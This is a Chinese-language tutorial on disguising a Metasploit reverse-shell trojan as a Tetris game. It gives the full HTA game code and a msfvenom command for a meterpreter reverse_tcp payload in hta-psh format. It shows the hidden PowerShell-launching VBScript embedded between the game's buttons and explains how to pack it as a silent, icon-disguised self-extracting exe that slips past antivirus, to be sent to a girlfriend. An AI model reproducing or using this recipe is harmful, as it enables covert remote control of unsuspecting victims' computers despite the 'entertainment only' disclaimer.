注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。
一、主要步骤:
1.制作一个hta(http application)游戏,文中用的是俄罗斯方块
2.用msf生成一个hta-psh 嵌入到hta游戏里面
3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)
最终效果如下:

开始:
1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代)
将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续….
<HTML>
<HEAD>
<title>俄罗斯游戏</title>
<script>window.resizeTo(410,450)</script>
<style>
<!--
.MB
{
BACKGROUND-COLOR: firebrick;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.SB
{
BACKGROUND-COLOR: slategray;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.BK
{
BACKGROUND-COLOR: white;
CURSOR: default;
HEIGHT: 22px;
WIDTH: 22px
}
.GT
{
BORDER-BOTTOM: deepskyblue thin solid;
BORDER-LEFT: deepskyblue thin solid;
BORDER-RIGHT: deepskyblue thin solid;
BORDER-TOP: deepskyblue thin solid;
CURSOR: default
}
-->
</style>
<script>
<!--
var BX=new Array(4); // x (column 0-9) of each of the 4 blocks of the falling piece
var BY=new Array(4); // y (row 0-15) of each of the 4 blocks of the falling piece
var PX=new Array(4); // x of each block of the next (preview) piece
var PY=new Array(4); // y of each block of the next (preview) piece
var mTimer // interval id of the fall timer (window.setInterval)
var firstView // true until the first piece of a game has been spawned (see randBar)
var gameState = 0; // 0 = idle / game over, 1 = running, 2 = paused
// score, speed, outTime and the loop indices i/j/k/l are assigned below without
// var, so they become implicit globals shared by beginGame/delLine/pauseGame.
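function beginGame()
{
  // "开始" button: reset score/speed, clear the 10x16 board, spawn the first
  // piece and start the fall timer.
  // score, speed and outTime are implicit globals shared with delLine() and
  // pauseGame(). The original `if(gameState!=0)return;` right after
  // `gameState=0;` could never trigger and has been dropped.
  var row, col;
  gameState=0;
  speed=1;
  outTime=1100-speed*100; // ms between drops; shrinks as speed rises
  score=0;
  firstView=true;
  for(row=0;row<16;row++){
    for(col=0;col<10;col++){
      setClass(col,row,"BK");
    }
  }
  randBar();
  gameState=1;
  Play.disabled=true;
  // restart the timer with a function reference (no string evaluation)
  window.clearInterval(mTimer);
  mTimer=window.setInterval(moveBar,outTime);
}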
function keyControl()
{
  // onkeydown handler of <body>. Reads the IE global `event`:
  //   37 = move left, 38 = rotate about the piece centre,
  //   39 = move right, 40 = drop one row (same as a timer tick).
  // Ignored unless a game is running (gameState==1). A move is refused, and
  // the board left untouched, if any block would leave the 10x16 board or
  // land on a settled ("SB") cell.
  if(gameState!=1)return;
  var key=event.keyCode;
  var n;
  // erase all four blocks, shift them horizontally by dx, then redraw
  function shiftPiece(dx){
    var k;
    for(k=0;k<4;k++)setClass(BX[k],BY[k],"BK");
    for(k=0;k<4;k++)BX[k]=BX[k]+dx;
    for(k=0;k<4;k++)setClass(BX[k],BY[k],"MB");
  }
  if(key==37){
    for(n=0;n<4;n++){
      if(BX[n]==0)return;
    }
    for(n=0;n<4;n++){
      if(getClass(BX[n]-1,BY[n])=="SB")return;
    }
    shiftPiece(-1);
  }
  else if(key==39){
    for(n=0;n<4;n++){
      if(BX[n]==9)return;
    }
    for(n=0;n<4;n++){
      if(getClass(BX[n]+1,BY[n])=="SB")return;
    }
    shiftPiece(1);
  }
  else if(key==38){
    var nextX=new Array(4);
    var nextY=new Array(4);
    var cx=Math.round((BX[0]+BX[1]+BX[2]+BX[3])/4);
    var cy=Math.round((BY[0]+BY[1]+BY[2]+BY[3])/4);
    for(n=0;n<4;n++){
      nextX[n]=Math.round(cx-cy+BY[n]);
      nextY[n]=Math.round(cx+cy-BX[n]);
      if(nextX[n]<0||nextX[n]>9||nextY[n]<0||nextY[n]>15)return;
      if(getClass(nextX[n],nextY[n])=="SB")return;
    }
    for(n=0;n<4;n++)setClass(BX[n],BY[n],"BK");
    for(n=0;n<4;n++){
      BX[n]=nextX[n];
      BY[n]=nextY[n];
    }
    for(n=0;n<4;n++)setClass(BX[n],BY[n],"MB");
  }
  else if(key==40){
    moveBar();
  }
}
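function delLine()
{
  // Called by moveBar() when the piece can no longer fall: lock it into the
  // board ("SB"), clear every full row, update score/speed, spawn the next
  // piece (randBar) and restart the fall timer.
  // score, speed and outTime are implicit globals shared with beginGame().
  var n, row, col, above, full;
  for(n=0;n<4;n++)setClass(BX[n],BY[n],"SB");
  // Scan top to bottom: rows shifted down into `row` were already checked,
  // so consecutive full rows are handled correctly.
  for(row=0;row<16;row++){
    full=true;
    for(col=0;col<10;col++){
      if(getClass(col,row)!="SB"){
        full=false;
        break;
      }
    }
    if(!full)continue;
    score=score+100;
    for(above=row;above>0;above--){
      for(col=0;col<10;col++){
        setClass(col,above,getClass(col,above-1));
      }
    }
    for(col=0;col<10;col++)setClass(col,0,"BK");
  }
  randBar();
  speed=Math.floor(score/3000)+1;
  outTime=1100-speed*100; // NOTE: reaches 0 at speed 11 (score >= 30000)
  scoreBar.innerHTML="得分 : " + score;
  speedBar.innerHTML="速度 : " + speed;
  window.clearInterval(mTimer);
  // randBar() may have ended the game (gameState=0); do not leave a timer
  // running in that case. Function reference instead of an eval'd string.
  if(gameState!=1)return;
  mTimer=window.setInterval(moveBar,outTime);
}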
function getClass(x,y){
  // CSS class ("BK"/"MB"/"SB") of board cell (x,y): GameBar is the <tbody>,
  // its children are the rows (y) and each row's children the cells (x).
  var rowEl=GameBar.children[y];
  return rowEl.children[x].className;
}
function setClass(x,y,cName){
  // Paint board cell (x,y) by assigning its CSS class ("BK"/"MB"/"SB").
  var rowEl=GameBar.children[y];
  rowEl.children[x].className=cName;
}
function moveBar()
{
  // Timer tick (and key 40): drop the falling piece one row. If it rests on
  // the bottom row (15) or on a settled ("SB") cell, stop the timer and hand
  // over to delLine() instead. No-op unless a game is running.
  if(gameState!=1)return;
  var n;
  var canFall=true;
  for(n=0;n<4;n++){
    if(BY[n]==15)canFall=false;
  }
  if(canFall){
    for(n=0;n<4;n++){
      if(getClass(BX[n],BY[n]+1)=="SB")canFall=false;
    }
  }
  if(!canFall){
    window.clearInterval(mTimer);
    delLine();
    return;
  }
  // erase all four blocks, move them down, then redraw
  for(n=0;n<4;n++)setClass(BX[n],BY[n],"BK");
  for(n=0;n<4;n++)BY[n]=BY[n]+1;
  for(n=0;n<4;n++)setClass(BX[n],BY[n],"MB");
}
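function pauseGame()
{
  // "暂停" button: toggle between running (gameState 1) and paused (2).
  // Reads the IE global `event` to reach the clicked button. Does nothing
  // before a game has started or after game over (gameState 0).
  // Fix: the original branched on the button's value being "Pause", but the
  // markup initialises it to "暂停", so the first click resumed instead of
  // pausing and started a second fall timer without clearing the first.
  // Branching on gameState and clearing before setInterval avoids both.
  if(gameState==0)return;
  var btn=event.srcElement;
  if(gameState==1){
    gameState=2;
    btn.value="Continue";
    window.clearInterval(mTimer);
    return;
  }
  gameState=1;
  btn.value="Pause";
  window.clearInterval(mTimer);
  mTimer=window.setInterval(moveBar,outTime);
}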
// Context-menu handler: always returns false so the right-click menu is suppressed.
function fMnu(){
  var allowMenu=false;
  return allowMenu;
}
document.oncontextmenu=fMnu; // fMnu returns false: suppress the right-click context menu
function preview()
{
  // "下一个预览" button: show or hide the next-piece preview table (#previewWnd).
  var box=previewWnd.style;
  var isHidden=(box.display=="none");
  box.display=isHidden?"block":"none";
}
function replayGame()
{
  // "重新开始" button: only while a game is running; asks for confirmation,
  // then stops the fall timer and starts a fresh game via beginGame().
  if(gameState!=1)return;
  var ok=confirm("确定重新开始游戏?");
  if(!ok)return;
  gameState=0;
  window.clearInterval(mTimer);
  beginGame();
}
function randBar()
{
  // Promote the previewed piece (PX/PY) to the active piece (BX/BY), draw a
  // new random preview piece into the 4x4 preview box, and end the game if the
  // new active piece overlaps a non-empty cell. On the first call of a game
  // (firstView) only the preview is filled and the function recurses once so
  // that both an active and a preview piece exist.
  // The 20 entries are the piece shapes/orientations of the original switch,
  // one [x,y] pair per block; x is 3..6, y is 0..3.
  var SHAPES=[
    [[4,0],[4,1],[5,1],[6,1]],
    [[4,0],[5,0],[4,1],[4,2]],
    [[4,0],[5,0],[6,0],[6,1]],
    [[5,0],[5,1],[5,2],[4,2]],
    [[6,0],[6,1],[4,1],[5,1]],
    [[4,0],[4,1],[4,2],[5,2]],
    [[4,0],[4,1],[5,0],[6,0]],
    [[4,0],[5,0],[5,1],[5,2]],
    [[4,0],[5,0],[5,1],[6,1]],
    [[5,0],[5,1],[4,1],[4,2]],
    [[4,1],[5,1],[5,0],[6,0]],
    [[4,0],[4,1],[5,1],[5,2]],
    [[4,0],[5,0],[6,0],[5,1]],
    [[4,0],[4,1],[4,2],[5,1]],
    [[5,0],[5,1],[4,1],[6,1]],
    [[5,0],[5,1],[5,2],[4,1]],
    [[4,0],[5,0],[4,1],[5,1]],
    [[4,0],[5,0],[4,1],[5,1]],
    [[3,0],[4,0],[5,0],[6,0]],
    [[5,0],[5,1],[5,2],[5,3]]
  ];
  var n, col, row;
  randNum=Math.floor(Math.random()*20)+1; // 1..20, implicit global as before
  if(!firstView){
    for(n=0;n<4;n++){
      BX[n]=PX[n];
      BY[n]=PY[n];
    }
  }
  var shape=SHAPES[randNum-1];
  for(n=0;n<4;n++){
    PX[n]=shape[n][0];
    PY[n]=shape[n][1];
  }
  if(firstView){
    firstView=false;
    randBar();
    return;
  }
  // redraw the preview box: clear all 16 cells, then paint the 4 blocks
  for(col=0;col<4;col++){
    for(row=0;row<4;row++){
      previewBar.children[row].children[col].className="BK";
    }
  }
  for(n=0;n<4;n++)previewBar.children[PY[n]].children[PX[n]-3].className="MB";
  // game over if the new active piece cannot be placed on an empty cell
  for(n=0;n<4;n++){
    if(getClass(BX[n],BY[n])!="BK"){
      alert("游戏结束!");
      window.clearInterval(mTimer);
      Play.disabled=false;
      gameState=0;
      return;
    }
  }
  for(n=0;n<4;n++)setClass(BX[n],BY[n],"MB");
}
// -->
</script>
</HEAD>
<BODY bgcolor="#EAF0F8" onkeydown="return keyControl();" topmargin="10" leftmargin="10" rightmargin="10" bottommargin="0" scroll=no>
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="100%"><tr><td width="100%" height="100%" align="center">
<table cellspacing=2 cellpadding=0 class=gt border=0 bordercolor="#EAF0F8" bgcolor="#EAF0F8">
<tr>
<td valign="top">
<table cellspacing=0 cellpadding=0 class=gt border=1 bordercolor="#EAF0F8" style="">
<Tbody id=GameBar>
<tr><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK>
</td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td><td nowrap class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK>
</td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr>
</tbody>
</table>
</td>
<td valign="top" align="center" style="padding: 10 10 0 10" bgcolor="#466285">
<table cellspacing=0 cellpadding=0 border=0>
<tr><td><font size=5 color=red face=consolas>得分</font></td></tr>
</table>
<table id="previewWnd" cellspacing=0 cellpadding=0 class=gt border=1 bordercolor="#EAF0F8" bgcolor="#EAF0F8" style="margin-top:15">
<Tbody id="previewBar">
<tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr><tr><td class=BK> </td><td class=BK> </td><td class=BK> </td><td class=BK> </td></tr>
</tbody>
</table>
<table cellspacing=3 cellpadding=0 border=0 style="margin-top:15">
<tr><td><input type=button id="Play" style="font-family:Tahoma; font-size:9pt; width:100px" value="开始" onclick="return beginGame();"></td></tr>
<tr><td><input type=button id="Pause" style="font-family:Tahoma; font-size:9pt; width:100px" value="暂停" onclick="return pauseGame();"></td></tr>
<tr><td><input type=button id="Preview" style="font-family:Tahoma; font-size:9pt; width:100px" value="下一个预览" onclick="preview();"></td></tr>
<tr><td><input type=button id="Replay" style="font-family:Tahoma; font-size:9pt; width:100px" value="重新开始" onclick="replayGame();"></td></tr>
</table>
<table cellspacing=3 cellpadding=0 border=0 style="font-family:Tahoma; font-size:9pt; font-weight: bold; margin-top:10">
<tr><td id=scoreBar style="color:#FFFFFF">得分 : 0</td></tr>
<tr><td id=speedBar style="color:#FFFFFF">游戏速度 : 1</td></tr>
</table>
</td>
</tr>
</table>
</td></tr></table>
</BODY>
</HTML>
<script>
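function unSel()
{
  // Clear any text selection every 100 ms so the board cannot be highlighted
  // by dragging the mouse. The timer is re-armed with a function reference
  // instead of an eval'd string ("unSel()").
  document.execCommand("Unselect");
  window.setTimeout(unSel,100);
}
unSel();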
</script>
2.用msf生成一个hta-psh 嵌入到hta游戏里面
使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f hta-psh >>shell.txt
用msfvenom生成的大概shell样式如下:
<script language="VBScript">
window.moveTo -4000, -4000
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
window.close()
</script>
然后稍作调整,把没必要的代码去掉嵌入到hta俄罗斯方块里
最终如下:
<script language="VBScript">
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
</script>
把最终代码放入hta如下位置即可
<table cellspacing=3 cellpadding=0 border=0 style="margin-top:15">
<tr><td><input type=button id="Play" style="font-family:Tahoma; font-size:9pt; width:100px" value="开始" onclick="return beginGame();"></td></tr>
//hta-psh shell段
<script language="VBScript">
Set rNztB = CreateObject("Wscript.Shell")
Set jGMUzylusp = CreateObject("Scripting.FileSystemObject")
For each path in Split(rNztB.ExpandEnvironmentStrings("%PSModulePath%"),";")
If jGMUzylusp.FileExists(path + "\..\powershell.exe") Then
rNztB.Run "powershell.exe -nop -w hidden -e aQBmACgAWw.... 省略一万个字符
Exit For
End If
Next
</script>
//hta-psh shell段
<tr><td><input type=button id="Pause" style="font-family:Tahoma; font-size:9pt; width:100px" value="暂停" onclick="return pauseGame();"></td></tr>
3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标
主要步骤如下:
在windows电脑桌面新建一个rar文件—->打开rar文件把制作的hta文件拖进去—->选择自解压格式—->高级自解压选项(V)…—->常规:在选项卡的解压路径一栏填入“C:\Users\Game\“(不要双引号),其他默认—->设置:在设置选项卡安装程序的解压后运行一栏输入“C:\Users\Game\game.hta“(不要双引号),其他默认—->模式:在模式选项卡,安静模式选择“全部隐藏”—->文本和图标:在文本和图标选项卡从文件加载自解压文件图标(T)一栏,选择要伪装的游戏图标ico格式的—->更新:在更新选项卡里,更改覆盖方式一栏为跳过已经存在的文件(K)—->确定—->确定
注意:记得msf监听的时候,设置一下 set exitonsession false,运行的时候是run -j
这样子可接受多个反弹的session,并且以一个job的方式在后台运行。
然后你会在桌面上看到一个exe格式的游戏了….丢给你心爱的姑凉吧….